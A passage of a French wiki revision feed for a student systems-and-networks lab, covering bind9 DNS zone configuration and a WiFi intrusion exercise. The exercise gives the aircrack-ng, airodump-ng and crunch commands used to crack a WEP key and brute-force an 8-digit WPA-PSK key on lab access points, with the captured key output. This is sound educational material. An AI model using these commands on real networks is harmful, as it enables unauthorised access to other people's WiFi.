J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12239</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12239"/>
		<updated>2026-02-10T22:21:01Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Configuration du paquetage bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration du paquetage bind9 ====&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12238</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12238"/>
		<updated>2026-02-10T22:20:05Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
==== Configuration du paquetage bind9 ====&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
